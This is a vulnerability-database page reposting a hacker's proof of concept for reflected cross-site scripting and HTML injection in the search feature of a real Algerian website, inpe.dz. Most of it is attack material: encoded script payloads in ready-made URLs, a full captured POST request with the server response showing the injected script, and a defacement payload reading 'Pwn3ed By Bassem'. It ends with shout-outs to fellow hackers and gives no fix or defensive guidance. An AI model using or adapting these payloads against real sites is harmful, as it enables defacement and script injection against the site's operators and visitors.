inpe.dz Reflected Cross Site Scripting [ XSS ] | HTML Injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1607072 漏洞类型
发布时间 2019-05-13 更新时间 2019-05-13
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050139
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#############################################################
#  Title :  inpe.dz Reflected Cross Site Scripting [ XSS ]  | HTML Injection 
#  Author :  : Dj3Bb4rAn0n ( bassem ) FB/djebbar.bassem.16
#  Date : /11/05/2019
#  Home : Annaba ( Algeria )
#  Tested on : Linux ( Backbox )
#  Vendor : finpe.dz
#############################################################


 [ + ]   PoC  :


# XSS 
---------

#  inpe.dz/fr/?action=recherche&rubrique=Résultat de la recherche  < ==== Inject here


#  Payload : %3Cscript%3Ealert%28%2Fhacked%2F%29%3C%2Fscript%3E
   -----------

#  inpe.dz/fr/?action=recherche&rubrique=Résultat de la recherche%3Cscript%3Ealert%28%2Fhacked%2F%29%3C%2Fscript%3E    

     
--------------------------- Post Request ----------------------------------

POST /fr/?action=recherche&rubrique=R%C3%A9sultat%20de%20la%20recherche HTTP/1.1
Host: inpe.dz
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://inpe.dz/fr/index_acc.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Connection: close
Cookie: fcspersistslider1=2; _ga=GA1.2.394734774.1557577567; _gid=GA1.2.1399442410.1557577567; style=null; __utma=67517641.394734774.1557577567.1557577593.1557583549.2; __utmz=67517641.1557583549.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/; __atuvc=41%7C19; __atuvs=5cd6d6bade5c6855014; __utmb=67517641.21.10.1557583549; __utmc=67517641; __utmt=1
Upgrade-Insecure-Requests: 1

recherche_mot=%3Cscript%3Ealert%28%2Fhacked%2F%29%3C%2Fscript%3E


-----------------------------

---------------------- Response ----------------------------------

HTTP/1.1 200 OK
Date: Sat, 11 May 2019 14:38:26 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Accept-Ranges: none
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 57434

---------------------------------------------------------------------

<div class="container" >
 <div class="content_left">
	<h3> Résultat de la recherche</h3><script>alert(/hacked/)</script>	   <script language="javascript" type="text/javascript">

------------------------------------
The javascript code injected
-----------------------------------
 
# Html injection
-------------------

#  inpe.dz/fr/?action=recherche&rubrique=Résultat de la recherche  <===== Inject here

#   Payload : <center><h1>Pwn3ed By Bassem</h1></center>

#  http://inpe.dz/fr/?action=recherche&rubrique=R%C3%A9sultat%20de%20la%20recherche%3Ccenter%3E%3Ch1%3EPwn3d%20By%20Bassem%3C/h1%3E%3C/center%3E

=======================================================

SHOOTZ  TO :  | Jag gar |  Lakarha_23 | Bl4ck

=======================================================